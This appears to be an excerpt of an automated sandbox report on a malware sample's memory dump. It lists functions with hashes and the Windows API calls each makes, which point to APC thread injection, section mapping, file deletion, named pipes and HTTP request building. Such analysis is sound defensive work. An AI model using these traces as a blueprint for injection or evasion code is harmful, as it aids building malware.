  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
